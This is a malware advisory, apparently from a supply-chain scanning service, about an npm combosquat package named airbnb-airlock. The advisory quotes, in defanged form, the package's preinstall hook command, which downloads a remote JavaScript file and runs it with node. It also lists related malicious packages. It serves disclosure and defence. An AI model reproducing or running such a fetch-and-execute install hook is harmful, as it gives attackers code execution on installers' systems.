airbnb-airlock@99.0.0
Malicious code in airbnb-airlock (npm)
T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1105 · Ingress Tool TransferT1071.001 · Web Protocols
Analysis
A combosquat package impersonating Airbnb's naming scheme (airbnb-airlock). The package contains no functional code — only a package.json declaring a preinstall lifecycle hook that runs 'curl hxxps://poc[.]amanrawat[.]com/hehe[.]js -o index.js && node index.js'. On npm install, this downloads a remote JavaScript payload from poc[.]amanrawat[.]com and executes it with Node.js, giving the attacker arbitrary code execution on the installer's system.
- analyzed by
- Leitwacht
- first seen
- Jun 23, 2026, 09:33 AM
- analyzed
- Jun 23, 2026, 09:33 AM
Related advisories
- set-cookie-ease@1.1.5
- analysis-chart@2.0.8
- web3-token-helper@1.1.3
- zod-pino@1.0.122
- node-core-libs@1.0.0
- tailwindcss-effector@1.7.0
- assertcore@3.1.7
- chalk-ultra@12.0.3
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.